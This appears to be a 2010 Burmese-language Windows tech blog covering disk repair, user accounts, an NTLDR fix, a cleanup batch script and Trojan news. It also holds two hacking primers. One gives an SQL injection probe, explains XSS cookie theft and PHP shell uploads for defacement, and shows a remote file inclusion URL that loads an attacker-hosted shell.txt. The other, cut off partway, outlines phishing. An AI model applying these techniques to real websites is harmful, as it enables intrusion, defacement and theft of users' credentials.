Thursday, September 30, 2010

Hard Disk ကို Scan ဖတ်ခြင်း။

My computerWindow:(c:) Right- Click Properties
Tools ထဲကနေError -Checking/Check Now...
Check Disk Windows (C:) Message box ထဲက
Automatically fix file system errors နဲ့ 
Scan for and attempt recovery of bad sectors
ဆိုတဲ့ Check Box လေးတွေကို On ပြီး Start လုပ်လိုက်ရင် ရပါပြီး။
Windows (C:) H.D.D ကို SCAN DISK ထားပြီးစစ်ပေးတာပါ/ကိုယ်ကကြိုက်တဲ H.D.D ရဲ့ Partation ကို
စစ်ပေးလို့ရပါတယ်။

Wednesday, September 29, 2010

BootSafe.exe <<< Download Now

BootSafe.exe (119 KB)

Safe mode ခေါ်လို့မရတော့ဘူး ဆိုရင်တော့.....
BootSafe.exe လေးနဲ့ ဖြေရှင်းကြည့်ပါ။
အဆင်ပြေသွားပါလိမ့်မယ်။

VirusEffectRemover_3.2.2.26-Setup <<< Download Link

Virus Effect Remover ကတော့ Virus ကြောင့်ဖြစ်ကျန်ခဲ့တဲ့
Effect တွေကို ဖယ်ရှားပေးမှာဖြစ်ပါတယ်။


လိုအပ်မယ်ဆိုရင်တော့.... ဒေါင်းသွားလိုက်ပါ။

Monday, September 13, 2010

Implementing User Account

Windows XP Operating System တွင် Administrator နှင့် Limited ဟူ၍ Account type (2)မျိုးပါရှိပါတယ်။ Administrator Account သည် Computer တစ်ခုလုံးကို လိုအပ်သလို ပြုပြင်ပြောင်းလဲခြင်းများ ပြုလုပ်နိုင်ပြီး၊ Limited Account များကတော့ အကန့် အသတ်ဖြင့်သာ အသုံးပြု့နိုင်ပါလိမ့်မယ်။ Windows XP Install လုပ် ပြီးသွားတဲ့အခါမှာ Default အနေနဲ့  Administrator နှင့် Guest ဆိုတဲ့ User account (2)ခုကို Create လုပ်ပြီး သားဖြစ်ပါတယ်။

Administrator – Administrator account သည် Windows logon ၀င်ရာတွင် အသုံးပြု့တဲ့ ပထမဆုံး account ပင်ဖြစ်ပါတယ်။ အဲ့ဒီ Account ဖြင့် Logon ၀င်ပြီးမှသာ အခြားသော Account အသစ်များ Create လုပ်ခြင်း၊ System configuration များ ပြင်ဆင်သတ်မှတ်ခြင်းများကို လုပ်ဆောင်နိုင်ပါလိမ့်မယ်။ Administr- ator account ရဲ့ထူးခြားတာကတော့… ၎င်း Administrator account ကို Delete လုပ်ခြင်း၊ အသုံးပြု၍မရ အောင် ပိတ်ထားခြင်း (Disable) တို့ ကို လုပ်ဆောင်၍ မရပါ။ Administrator အမည်အစား တစ်ခြားသော အမည်တတစ်ခုခု ပြောင်းလဲလိုပါက ပြောင်းလဲအသုံးပြုနိုင်ပါတယ်။

Guest – Guest account သည် Computer မှာကိုယ်ပိုင် Account မရှိတဲ့သူများ Logon ၀င်ရောက် အသုံးပြု နိုင်စေရန်ဖြစ်ပါတယ်။

Buildin Account (Administrator/ Guest) နှစ်မျိုးအပြင် မိမိတို့  အသုံးပြု့လိုတဲ့ အပေါ်မူတည်ပြီး User account များကို Create လုပ်လို့ ရပါတယ်။ Account create လုပ်ရာတွင် Computer management နှင့် Control Panel (2)နေရာတို့ မှာ လုပ်ဆောင်နိုင်ပါတယ်။

Saturday, September 11, 2010

How to fix NTLDR is Missing Windows XP <<< Down Load fixntldriso.zip

NTLDR ဆိုသည်မှာ NT Loader ရဲ့ အတိုကောက်တစ်ခုဖြစ်ပါတယ်။ ၎င်းသည် Hard Disk ၏ Sector တွင်ရှိသော Program တစ်ပုဒ်ပင်ဖြစ်ပါတယ်။
ယင်းသည် Windows NT ကို တက်အောင်ကူညီပေးခြင်းနဲ့ Windows NT Startup Menu ကို ပြပေးနိုင် အောင် ပြုလုပ်ပေးသည်။ ထို့ကြောင့် NTLDR
ဆိုသော Program file လေးဟာ အကြောင်းအမျိုးမျိုးကြောင့် Hard disk ရဲ့ Boot Sector ကနေ ပျက်ဆီးပျောက်ဆုံးခဲ့ရင် သင့်ကွန်ပျူတာဟာ Windows
မတက်နိုင်တော့ခြင်းဖြစ်ပါတယ်။ Windows XP သည် လည်း Windows NT ပေါ်တွင် အခြေခံပြီး တည်ဆောက်ထားတာကြောင့် NTLDR ကို အသုံးပြုထားပြီး
NTLDR ပျောက်သွား ပါ က Windows XP သည်လည်း တက်နိုင်မည် မဟုတ်တော့ပေ။ ထို့ကြောင့် မိမိကွန်ပျူတာတွင် NTLDR မရှိတော့ပါက Boot လုပ်
တဲ့အချိန်မှာ-
NTLDR is missing
Press any key to Restart ဟူသော စာတန်းကိုသာမြင်တွေ့ရပြီး၊ Windows တက်မလာတော့ပါ။
ယင်းအခြေအနေ ဖြစ်ပေါ်ရခြင်းမှာ-

(၁) Boot မလုပ်ပေးနိုင်သော နေရာမှ Computer ကို သွား၍ Boot လုပ်ခိုင်းမိခြင်း။
(၂) Hard Disk ကို BIOS setup ထဲတွင် တိတိကျကျ မကြေငြာထားခြင်း။
(၃) NTLDR ပျက်ခြင်း (သို့မဟုတ်) ၎င်းနှင့်အလားတူ NTDETECT.COM ဆိုသည့် File ပျက်ခြင်း။
(၄) Boot.ini ဆိုသည့် File အား မှားယွင်းပြီး Configuration လုပ်ထားမိခြင်း။
(၅) FAT 32 ကို အသုံးပြုထားသည့် Win 95, 98 နှင့် ME တို့မှ Windows XP သို့ Upgrade လုပ်ထားမိခြင်း။
(၆) Hard Disk အသစ်တစ်လုံးအား ထပ်မံ၍ တပ်ထားမိခြင်း။
(၇) Hard Disk အတွင်းရှိ Boot Sector (သို့မဟုတ်) Master Boot Record ပျက်သွားခြင်း။
(၈) Windows 2000 (သို့မဟုတ်) Windows XP ကြီးတစ်ခုလုံး ပျက်သွားရခြင်း။
(၉) IDE (သို့) EIDE hard disk ၏ Data Cable ပျက်စီးဆုံးရှုံးသွားခြင်း စသည့် အကြောင်းရင်းများကြောင့် ယခု ကဲ့သို့ ပြဿနာများ ဖြစ်ပေါ်ရခြင်း ဖြစ်ပါသည်။


ဖြေရှင်းနည်း (၁) >>> Windows XP Installer CD ဖြင့် ဖြေရှင်းခြင်း။

(၁)Windows XP CD ကို ကွန်ပျူတာရှိ Drive တွင်ထည့်ပြီး၊ CD ကနေ Boot တက်လိုက်ပါ။
(၂) Welcome to Setup ဆိုတဲ့ Screen ပေါ်လာပါက Keyboard မှ Repair လုပ်ရန်အတွက် (R) ကို နှိပ်လိုက်ပါ။
(၃) မိမိပြင်မည့်စက်တွင် Windows တစ်ခုတည်းရှိပါက 1 လို့ရိုက်ထည့်ပြီး Enter ကိုနှိပ်လိုက်ပါ။(C:Partitionကို (1) ဟုသတ်မှတ်ထားသောကြောင့်ဖြစ်သည်။)
(၄) Administrator Password ရှိပါက ရိုက်ထည့်ပေးလိုက်ပါ။ မရှိပါက Enter ကိုသာနှိပ်လိုက်ပါ။
(၅) Command Prompt မှ နေ၍ NTLDR နှင့် NTDETECT.COM ဆိုတဲ့ဖိုင် (၂)ဖိုင်ကို CD Drive မှ Hard Disk ထဲသို့ Copy ကူးထည့်ရပါမယ်။
အောက်မှာ ဥပမာပြထားတဲ့ Command များကတော့ >>>
C: ဆိုသည်မှာ Hard Disk ကို ကိုယ်စားပြုပြီး။ D: ဆိုသည်မှာ CD Drive ကို ကိုယ်စားပြုထားပါတယ်လို့ ဆိုကြပါစို့။
ထို့ကြောင့်သင့်အနေဖြင့်-DriveLetterကိုပြောင်းပေးရပါမယ်။
Keyboard မှ Map လို့ ရိုက်ထည့်ပြီး Enter နှိပ်လိုက်ပါက CD Drive နဲ့ Windows Partition တို့ရဲ့ Drive Letter များကို ပြပါမယ်။

COPY D:\I386\NTLDR C:\ ( Enter)
COPY D:\I386\NTDETECT.COM C:\ (Enter)

Command တစ်ခုရိုက်ပြီးသွားသောအခါ Keyboard မှ Enter နှိပ်လိုက်ပါ။ 1 File(s) Copied လို့ ပြပါက File Install လုပ်တာ အောင်မြင်သွားပါပြီ။
(၂)ဖိုင်စလုံး Copy ကူးတင်ပြီးသောအခါ Windows CD အခွေကို Drive ထဲက ပြန်ထုတ် ပြီး Computer ကို Researt ပြန်ချလိုက်ပါ။

ဖြေရှင်းနည်း(၂) >>> NTLDR_Boot_Disk ဖြင့်ဖြေရှင်းခြင်း။
(၁) NTLDR Fixing Bootable CD တစ်ချပ်ဖန်တီးရန်အတွက် fixntldriso.zip ဖိုင်တစ်ဖိုင်ကို Download ပြုလုပ်ထားပါ။
(http://downloads.ziddu.com/downloadfile/5235112/fixntldriso.zip.html)
(၂) ထို့နောက် ရရှိလာသော Zip ဖိုင်ကို Win RAR ဖြင့် Extract Files ပြုလုပ်ပါ။
ရရှိလာသော zip file အတွင်းမှ ဖိုင်(၈)ဖိုင်စလုံးကို Nero ဖြင့် CD-ROM(ISO) Format ဖြင့် ခွေကူးလိုက်ပါ။
(၃) ရရှိလာသော Bootable CD ခွေကို CD Drive တွင်ထည့်ပါ။
ထို့နောက် Computer ကို ပြန်ဖွင့်ပြီး Keyboard မှ Delete Key
(or) Bios အတွင်းသို့ဝင်ရောက်ရန်အတွက် ညွှန်ကြားပြသထားသော Key တစ်ခုခုကို နှိပ်လိုက်ပါ။
ထို့နောက် Boot Device တွင် 1st Boot Order ကို CD Drive ကို ညွှန်းပေးပါ။
(၄) ထို့နောက် Save and Exit ပြုလုပ်ပါ။ ထိုအခါ Press any key to boot from CD ပေါ်လာပါမည်။ Keyboard မှ key တစ်ခုခုကိုနှိပ်လိုက်သောအခါ၊အောက်ပါအတိုင်းစာတန်းများကိုမြင်တွေ့ရပါမည်။

{1ST_TRY_THIS_seleccione_esto_primero
2ND_TRY_THIS_essayez_ceci_en_deuzieme
3RD_TRY_THIS_wahlen_Sie_diesen_Third
4TH_TRY_THIS_selezioni_questo_fourth
5TH_TRY_THIS_selecione_este_fifth
6TH_TRY_THIS_seleccione_este_sexto
7TH_TRY_THIS_essayez_ceci_en_septieme
8TH_TRY_THIS_wahlen_Sie_dieses_achte
9TH_TRY_THIS_selezioni_questo_nono
10TH_TRY_THIS_selecione_este_decimo …….}

(5)1ST_TRY_THIS_seleccione_esto_primero ကိုသာ ရွေးချယ်ပြီး Enter ကို နှိပ်လိုက်ပါ။ ထိုအခါ Windows ပြန်တက်လာပါလိမ့်မယ်။

Create User Account

User account တွေကို Create လုပ်ရာတွင် Computer Management နှင့် Control Panel တို့ တွင်ပြုလုပ်နိုင် ပါတယ်။
Control Panel တွင် User account ပြုလုပ်ပုံ အဆင့်ဆင့်မှာ….
Statr > Setting > Control Panel ထဲသို့ သွားပါ။
(Run box ထဲမှာ control လို့ ရိုက်ပြီးခေါ်လို့ ရပါတယ်။)

Control Panel Box ကျလာပါလိမ့်မယ်။ အဲ့ဒီမှာ User Account ဆိုတာကို Click နှိပ်လိုက်ပါ။

User Accounts Box ကျလာပါလိမ့်မယ်။ အဲ့ဒီ Box ထဲမှာ….
 Change an account
 Create a new account
 Change the way user log on or off ….. ဆိုပြီး Function (3) ခုပါဝင် ပါတယ်။
အခုပြုလုပ်မှာက User account အသစ်တစ်ခု Create လုပ်မှာဆိုတော့…. Create a new account ဆိုတဲ့ နေရာကို Click နှိပ်ပါ။

အဲ့ဒီအခါမှာတော့… မိမိတို့  ပြုလုပ်ချင်တဲ့ User account ကို name တစ်ခုပေးဖို့ လိုပါတယ်။
Type a name for the new account ဆိုတဲ့ အကွက်ထဲမှာ မိမိတို့ ပေးချင်တဲ့ name တစ်ခုခုကို ရိုက်ထည့်ပေးပါ။
Name ပေး ပြီးရင်တော့ Next ကိုနှိပ်ပြီး ဆက်သွားပါ။

Account Type သတ်မှတ်ပေးရမယ့် အဆင့်ရောက်လာပါလိမ့်မယ်။
အဲ့ဒီမှာတော့… မိမိတို့  အသစ် Create လုပ်တဲ့ User account ကို ဘယ်လို လုပ်ပိုင်ခွင့်တွေပေးထားမလဲ ဆိုတာကိုရွေးပေးရမှာပါ။
ဥပမာ… မိမိတို့  Account ကို Computer Administrator အနေနဲ့ ထားသုံးမလား ၊ Limited အနေနဲ့ ထားသုံးမလားပေါ့။
သတ်မှတ်ပေးပြီး ရင်တော့ Create Account ဆိုတာကို Click နှိပ်ပါ။

အဲ့ဒါဆိုရင်တော့… မိမိတို့  Computer မှာ User Account တစ်ခုတည်ဆောက်ပြီးသွားပါပြီ။
User Account မှာ Password ပေးထားချင်တယ်ဆိုရင်တော့ မိမိတို့ တည်ဆောက်ထားတဲ့
Account မှာ Click နှိပ်ပြီး Password ပေးလို့ ရပါတယ်။

အားလုံးပြီးသွားပြီ ဆိုရင် Computer ကို Logon ပြန်ဝင်ကြည့်လိုက်ပါ။
မိမိတို့ အသစ် Create လုပ်ထားသော User Account နဲ့  Logon သင်ပြီး အသုံးပြုနိုင်ပါပြီ။


မှတ်ချက်။ ။ ပုံတွေကို Upload လုပ်ရတာ အဆင်မပြေလို့  စာသားတွေနဲ့ ပဲ ဖေါ်ပြပေးရတာပါ။

Friday, September 10, 2010

နာမည်ကျော်ကြားသူများ သေဆုံးသည့် သတင်းဖြင့် နောက်ဆုံးပေါ် Trojan တိုက်ခိုက်

အင်တာနက်မှ လိမ်လည်တိုက်ခိုက်သူများသည် ဘီယွန်ဆေး၊ တွမ်ခရုစ်၊ တိုက်ဂါးဝုဒ် စသည့် နာမည်ကျော်ကြားသူများ ကားတိုက်မှုကြောင့် သေဆုံးခြင်း (သို့) လေယာဉ်ပျက်ကျ သေဆုံးခြင်း စသည့်လင့်ခ်များပါဝင်သော
အီးမေးလ်များဖြင့်ပေးပို့ကာ တိုက်ခိုက်လျက်ရှိပြီး ယင်းသတင်းကို
ဖတ်ရှုမိသူများအနေဖြင့် ၎င်းတို့၏ ကွန်ပျူတာများအတွင်းသို့ ဗိုင်းရပ်စ်များ
ဝင်ရောက်ကူးစက်မှုများ ဖြစ်ပွားလျက်ရှိကြောင်း သိရသည်။
အဆိုပါဗိုင်းရပ်စ်ပါဝင်သော အီးမေးလ်တွင် အထက်ဖော်ပြပါ
နာမည်ကျော်ကြားသူများသည် အခြားခရီးသည် ၃၄ ဦးနှင့်အတူ လေယာဉ်ပျက်ကျမှုတွင်
သေဆုံးသွားကြောင်း ဖော်ပြထားသည်။ ယင်းအီးမေးလ်တွင် ပါဝင်သောလင့်ခ်ကို
နှိပ်မိသူများအနေဖြင့် ကွန်ပျူတာအတွင်းသို့ Trojan ဗိုင်းရပ်စ်များကို
ထည့်သွင်းမိစေပြီး ယင်းသည် ကွန်ပျူတာကို အဝေးထိန်းစနစ်ဖြင့်
ထိန်းချုပ်နိုင်စေမည့် ဗိုင်းရပ်စ်ဖြစ်ကြောင်း သိရသည်။
အင်တာနက်လုံခြုံရေးကုမ္ပဏီဖြစ်သော Symantec ၏အဆိုအရ Trojan.Zbot ကူးစက်မှုသည်
သြဂုတ်လတွင် စတင်ဖြစ်ပွားခြင်းဖြစ်ပြီး လက်ရှိတွင်ကူးစက်ခံရသည့် ကွန်ပျူတာ
၈၀,၀၀၀ မှ ၁၀၀,၀၀၀ နီးပါးရှိကြောင်း သိရသည်။

windows7 အတွက် zawgyi keyboard <<< Download Now

Windows 7- 64 bit မှာ zawgyi ကို install လုပ်ပြီး Control Panel\Reigon and Language\Keyboards and Languages\ ကနေ
zawgyi ကို ပြောင်းပေမယ့် ဘယ်လိုမှ မြန်မာဖောင့်ရိုက်လို့မရပါဘူး...တော်တော်လေးကို ခေါင်းရှုပ်ခဲ့ရတယ်ဆိုတဲ့ ညီအကိုများ...
ဒီကောင်လေးကို ဒေါင်းပြီး install လုပ်လိုက်ဗျာ ရိုက်လို့ရပြီ......

Clean Your Computer Without Program {Easy & Faster}

Run ကနေပြီး Prefetch , Recent , Cookies စသဖြင့် တစ်ခုချင်းရှင်းနေရတာ အချိန်ကြတယ်။ အလုပ်ရှုပ် တယ်။ အားလုံးကို တစ်ခါတည်းရှင်းဖို့အတွက် ပေါင်းရေးထားတာလေးတစ်ခုပါ။ အောက်မှာပေးထားတဲ့ Code လေးတွေကို Copy ကူးပြီး Notepad ထဲမှာထည့်။ Save တဲ့အခါမှာ Filename.bat ဆိုပြီး File name တစ်ခုခု ရေးပြီး (.bat extension) နဲ့ သိမ်းလိုက်ပါ။ Filename ကတော့ နှစ်သက်ရာပေးပေါ့။ အဓိက bat extension ဖြစ်ဖို့ပါပဲ။ ပြီးရင် ရလာတဲ့ bat ဖိုင်လေးကို Double Click ပေးလိုက်ရင် သူ့အလိုလို မိမိကွန်ပျုတာထဲမှ အမှိုက် သရိုက်များ အညစ်အကြေးများကို ရှင်းလင်းပေးသွားပါလိမ့်မယ်။ နောက်ဆုံးမှာ ပြီးသွားပြီဆို နှစ်သက်ရာ Any Key တစ်ခုခုကို နှိပ်ပြီး Exit လို့ ရပါပြီ။


@ECHO off
color DE
title AuToClEaNeR-www.hbonekyaw.blogspot.com
SET T1= Done By Hbone Kyaw
DEL %systemroot%prefetch /Q /S
DEL "%USERPROFILE%Local SettingsTemporary Internet Files" /Q /S /F
DEL "%USERPROFILE%Local SettingsTemp" /Q /S /F
DEL "%USERPROFILE%Local SettingsHistorique" /Q /S /F
DEL "%USERPROFILE%RECENT" /Q /S /F
DEL "%USERPROFILE%Cookies" /Q /S /F
Echo ******* *******
Echo ****** ******
Echo ***** *****
Echo **** Finished ****
Echo ***** *****
Echo ****** ******
Echo ******* *******
Pause
start www.hbonekyaw.blogspot.com
EXIT

Missing Run Command in Windows XP

Windows XP ကိုအသုံးပြုနေကြသူများ တစ်ခါတစ်လေမှာ Run command ကိုခေါ်လို့ မရတာမျိုးတွေ ကြုံ တတ်ပါတယ်။ ဘာကြောင့် ဒီ Run Command ကို ခေါ်လို့ မရတာလဲဆိုတော့ Virus ကြောင့်လည်းဖြစ် နိင် ပါတယ်။ System ရဲ့ Error တွေကြောင့်လည်းဖြစ်နိုင်ပါတယ်။ ဘယ်လိုကြောင့်ပဲ ဖြစ်ဖြစ်။ ဖြစ်လာခဲ့ရင်တော့ အောက်ပါ နည်းလမ်း (၂)ခုနဲ့  အဆင်ပြေသလိုဆောင်ရွက်နိုင်ပါတယ်။

နည်းလမ်း (၁)
Taskbar ပေါ်မှာ Right Click ထောက်ပြီး Properties ကို သွားလိုက်ပါ။
Start Menu tab ကို ရွေးပြီး Customize button ကို Click ပါ။
Advanced tab ကို သွားပြီး Start menu items ထဲမှာ Run command ကိုရှာလိုက်ပါ။
Run command ကို Check ပေးပြီး Ok ကို Click လိုက်ပါ။

နည်းလမ်း (၂)
My Computer icon ကို Right Click ထောက်ပြီး Explore နဲ့ ဖွင့်လိုက်ပါ။ C:WindowsSystem32 အထိ သွားလိုက်ပါ။System32 ထဲမှာ gpedit.msc ကို လိုက်ရှာပြီး Double Click ပေးလိုက်ပါ။ Group Policy Editor တက်လာပါလိမ့်မယ်။ ဘယ်ဘက်မှာရှိတဲ့ User Configuration Administrative Templates Start Menu and Taskbar ကို Select လုပ်လိုက်ပါ။ ညာဘက်မှာရှိတဲ့ Remove Run menu from Start Menu ကို Double click ပေးလိုက်ပါ။ Disabled ကို ရွေးပြီး OK ပေးလိုက်ပါ။

Thursday, September 9, 2010

Web Hacking...။

Web hacking နည်းပညာတွေဟာ တစ်ဘက်ကကြည့်ရင်လည်း Website ကို ကာကွယ်ဖို့အတွက် ကူညီပါ လိမ့်မယ်။
(က)SQL Injection
( ခ ) XSS
( ဂ) Shells
(ဃ) RFI ……;
နောက်ထပ်အများကြီး ရှိပါသေးတယ်။

(က) SQL Injection
Website အများစုဟာ SQL Database တစ်ခုနဲ့ connect လုပ်ထားကြပါတယ်။ SQL Databaseက သူတို့ရဲ့ Website သို့ လာရောက်လာပတ်သူက register လုပ်သွားတဲ့အခါ Username နဲ့ Password တွေ (encrypt လုပ်ပြီး)ကို သိမ်းဆည်းထားဖို့အတွက် သူတို့ကို ကူညီပါတယ်။ SQL database က user တစ်ယောက် logs in လုပ်တဲ့ အခါတိုင်းမှာ မေးခွန်းတွေမေးမြန်းတဲ့ အလုပ်ငန်းစဉ်ကို လုပ်ဆောင်ပါတယ်။ ၄င်းတို့ database ဆီသွား ပြီး မှန်ကန်သေချာတဲ့ password ဟုတ်မဟုတ် ကြည့်ပါတယ်။ အကယ်၍ မှန်ကန်တယ်ဆိုရင်တော့ user ကို log in လိုက်ပါတယ်၊ မမှန်ဘူးဆိုရင်တော့ error တစ်ခုကို ပေးပါလိမ့်မယ်။ ဒါကြောင့် အခြေခံဆောင်ရွက်ချက် ကတော့ database မှာရှိတဲ့ internet information ကို အသုံးချဖို့ကြိုးစားပြီး database ထဲမှာရှိတဲ့ database ထဲမှာ မေးခွန်းတစ်ခုကို စစ်ဆေးဖို့ command တစ်ခုကို လိုက်နာဆောင်ရွက်နေခြင်းဖြစ်ပါတယ်။ ဒီနည်းလမ်း ဟာ website ကို hack ဖို့အတွက် နည်းလမ်းတွေထဲမှာ အရှုပ်ထွေး အခက်ခဲဆုံးနည်းလမ်းတစ်ခု ဖြစ်ပါတယ်။
Website မှာ RFI attach လုပ်ဖို့ အားနည်းချက်ရှိလား မရှိလားဆိုတာကို သိချင်ရင် အောက်ပါအတိုင်းပြု လုပ် ပါ...။
အကယ်၍ Site ရဲ့ URL က.... yoursite.com/index.php?id=545
ဖြစ်နေတယ်ဆိုရင် ၄င်းရဲ့ အဆုံးမှာ ( ' ) ကို အောက်မှာ ပြထားသလိုမျိုး ပေါင်းထည့်ပေးပါ...။

yoursite.com/index.php?id=545'

( ခ ) XSS
XSS ကတော့ အချို့ Website တွေကို hack ဖို့အတွက် ကောင်းမွန်တဲ့ အခြားနည်းလမ်းတစ်ခုလို့ ဆိုနိုင်ပါ တယ်။ အချို့ Website/ forum တွေက post ( သို့ ) ဆောင်းပါး တွေထဲမှာ HTML ခွင့်ပြုခဲ့မယ်ဆိုရင် hacker က content ထဲကို အန္တရာယ်ရှိတဲ့ script တွေကို post လုပ်နိုင်ပါတယ်။ ဒါကြောင့် ဘယ်အချိန်မဆို user တစ်ယောက်က page ကိုဖွင့်လိုက်တိုင်း cookieတွေက hacker ဆီကိုပေးပို့ပါလိမ့်မယ်။ ဒီအတွက် သူက user ကဲ့သို့ log in လုပ်နိုင်ပြီး website ကို #$%@# လုပ်ပါတော့တယ်။

( ဂ ) Shells
Shell ဆိုတာကတော့ အန္တရာယ်ရှိတဲ့ .php script ဖြစ်ပါတယ်။ ၄င်းကိုဘယ်လိုလုပ်ရမလဲ ဆိုတော့ avaters, recepie, tricks , feedbacks ကဲ့သို့သော ဘယ်ဖိုင်မဆို upload လုပ်နိုင်တဲ့ website တစ်ခုခုမှာ နေရာတစ်ခု ရှာပါ။ ပြီးရင် သင့်ရဲ့ shell file ကို အဲဒီထဲကို upload လုပ်နိုင်ဖို့ကြိုးစားပါ။ upload ပြီးသွားရင် ၄င်းကို URL bar မှာဖွင့်ပါ။ အဲဒီ Webhosting ရဲ့ FTP account တစ်ခုလုံးကို သင် မြင်ရပါလိမ့်မယ်။ index page ထဲမှာပါ ၀င်သမျှကို သင့်စိတ်ကြိုက် rename/Edit/upload/download ကြိုက်သလိုလုပ်လို့ရပါပြီ။ အခုလိုပြုလုပ်ခြင်းကို deface လို့လည်း ခေါ်ပါတယ်။


(ဃ) RFI
RFI ကလည်း Website တစ်ခုကို deface လုပ်ဖို့အတွက် ကောင်းတဲ့နည်းလမ်းတစ်ခုပဲ ဖြစ်ပါတယ်။ ၄င်းကို shell နဲ့အတူအသုံးပြုရမှာ ဖြစ်ပါတယ်။ ၄င်းကို သင့်ရဲ့ shell ပေါ်မှာ upload လုပ်ပြီးပြီး ဆိုရင် သင့်ကိုအ ထောက်အကူပေးပါလိမ့်မယ်...။

yoursite.com/shell.txt
သင်က RFT သို့ အားနည်းချက်ရှိတဲ့ site တစ်ခုကို ရှာတွေ့ရပါမယ်။ အဲဒီနောက် အောက်မှာပြထားတဲ့ အတိုင်း ပြုလုပ်နိုင်ပါတယ်။

victimssite.com/index.php?page=yousite.com/shell.txt

ဒီဟာက သင့်ကို သင့်သားကောင်ရဲ့ sites FTP ၀င်လမ်း ကို ထပ်ပေးပါလိမ့်မယ်။ shell မှာလိုပဲ သင်ကြိုက် သလို သင့်စိတ်ကြိုက် လုပ်လို့ရပါပြီ။ အကယ်၍သင်ကသင့် website က RFI attach လုပ်ဖို့ အားနည်းချက် ရှိလား မရှိဘူးလားဆိုတာကို စစ်ဆေးချင်ရင် အောက်ပါအတိုင်း လုပ်ပါ...။
အကယ်၍ သင့် site ရဲ့ URL က

yoursite.com/index.php?id=545

ဖြစ်နေခဲ့ရင် ၄င်းရဲ့ အဆုံးမှာ အောက်မှာပြထားတဲ့ အတိုင်း ပေါင်းထည့်ပေးပါ...။

yoursite.com/index.php?id=http://www.google.com
အကယ်၍ သင့် page ထဲမှာ google page ပါဝင်နေမယ်ဆိုရင်တော့ အဲဒီအဓိပ္ပာယ်က RFI သို့ တွဲဆက်ခြင်း မှာ ပျော့ကွက်တစ်ခုဖြစ်ပါတယ်။

Wednesday, September 8, 2010

HACKING INFORMATION

Hacking နဲ့ ဆိုင်တဲ့ အခြေခံအတွေးအခေါ်လေးတွေကို ဖော်ပြထားတာဖြစ်ပါတယ်။ ဒါတွေကို ဘယ်လိုဆင့်ပွား ပြီး အသုံးချရမယ်ဆိုတာကတော့ ကိုယ့်ကိုကိုယ် အားကိုးရပါလိမ့်မယ်။
နောက်ခံအခြေအနေ
Hack တဲ့ နည်းလမ်းတွေကို Windows 98 ဒီဇိုင်းပြုလုပ်ပြီးကတည်းက စတင်ခဲ့တာဖြစ်ပါတယ်။ Hacking ဆို တာ အခြေခံအားဖြင့်တော့ ပျော့ကွက်၊ဟာကွက် ကွင်းဆက်တွေကို ရှာဖွေပြီး ၄င်းတို့ထဲကမှာ အချို့ယိုစိမ့် နိုင် တဲ့ hole တွေကနေ information တွေထွက်လာအောင် ကြိုးစားတာဖြစ်ပြီး၊သင့်အတွက် အရေးပါနိုင်တဲ့ Password များ၊ Credit Card နဲ့သက်ဆိုင်တဲ့ အသေးစိတ်အချက်အလက်များကို ရယူချင် ရယူနိုင်ပါတယ်။ တစ်ခါတစ်ရံမှာတော့ ပုဂ္ဂိုလ်ရေးဆိုင်ရာ တိုက်ခိုက်မှုတွေအတွက် အသုံးပြုကြပါတယ်။

သတိပြုရန်အကြောင်းအရာ
အကြံပေးချင်တာကတော့ ကောင်းမွန်တဲ့ Site တွေကနေ ဆောင်းပါးတွေ၊ ပို့ချချက်တွေကို သေချာဖတ်ရှုလေ့ လာဖို့လိုပါတယ်။ ဒါဟာ Hacking ကို လေ့လာခြင်းမှာ တစ်ခုတည်းသော နည်းလမ်းဖြစ်ပါတယ်။

မိတ်ဆက်
အဓိကကျတဲ့ အချက်တွေကိုပဲ ဖော်ပြပြီး hacking နည်းလမ်း အချို့ကို အကျဉ်းချုပ်ဖေါ်ပြသွားမှာ ဖြစ်ပါတယ်။ Hacking မှာ အခြေခံအားဖြင့် အဓိကကျတဲ့ အပိုင်းနှစ်ပိုင်း ကွဲထွက်နေပါတယ်။ အဲဒါကတော့...
၁။ Email (သို့) User information
၂။ Web based hacking တို့ပဲဖြစ်ပါတယ်။

Email (သို့) User information
ယနေ့အချိန်မှာ အများဆုံးအသုံးပြုနေကျဖြစ်တဲ့၊ Email, Passwords, Credit Card details စတဲ့ user information များကို hack တဲ့အခါ ကျော်ကြားနေတဲ့ နည်းလမ်းတွေကတော့ အောက်ပါအတိုင်း ဖြစ် ပါတယ်။
(က) Phishing
( ခ ) Brute Forcing
( ဂ ) Keylogging
(ဃ) Trojans

(က)Phishing
Phishing ဆိုတာကတော့ ပုံမှန်အားဖြင့်ထူးခြားတဲ့တိုက်ခိုက်မှုတစ်ခုဖြစ်ပါတယ်။ Hacker တွေကအချို့website (သို့) gmail နဲ့ လုံးဝနီးပါးဆင်တူတဲ့ page တစ်ခုကို ဖန်တီးလိုက်ခြင်းဖြစ်ပါတယ်။ အဲ့ဒီ page တွေကို Hacker တွေက သူတို့ရဲ့ ကိုယ်ပိုင် server တွေမှာ upload လုပ်ကြပါတယ်။ အဲဒီနောက် User အသစ်တွေ ဆီကို အဲဒီ link တွေပေးပို့ပါတယ်။ User တွေက အဲဒီ link ကိုဖွင့်လိုက်တဲ့ အခါ User တွေ အနေနဲ့ သူတို့ ရောက်ချင်တဲ့ website (သို့) gmail လို့ထင်ပြီး သူတို့ရဲ့ username နဲ့ password တွေကိုရိုက်ထည့်ပြီး sign in (သို့) submit ကို click လိုက်ပြီဆိုရင်တော့… အဲဒီ user ရဲ့ information တွေကို hacker ကရရှိသွားပါပြီ။ ဒီနည်းလမ်းကို hacking လောကထဲကို ၀င်ရောက်ဖို့ကြိုးစားနေကြတဲ့ လူသစ်တွေကျယ်ကျယ်ပြန့်ပြန့် အသုံးပြု့နေတဲ့နည်းလမ်း တစ်ခုဖြစ်ပါတယ်။ဒီနည်းလမ်းကို အသုံးပြုပြီး အိန္ဒိယမှာ ရှိတဲ့ ICICI bank နဲ့ပတ်သတ်ပြီး ဖြစ်ခဲ့တဲ့သာဓက တစ်ခုရှိပါတယ်။ များစွာသော User info… တွေကို ဒီနည်းလမ်းကို အသုံးပြုပြီး အခိုးခံခဲ့ရတာဖြစ်ပါတယ်။

အားနည်းချက်
